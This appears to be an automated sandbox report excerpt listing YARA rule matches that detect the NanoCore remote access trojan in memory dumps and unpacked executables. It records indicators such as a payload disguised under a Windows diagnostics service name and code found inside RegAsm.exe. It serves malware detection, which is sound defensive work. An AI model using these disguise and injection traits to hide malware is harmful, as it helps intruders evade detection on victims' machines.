        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
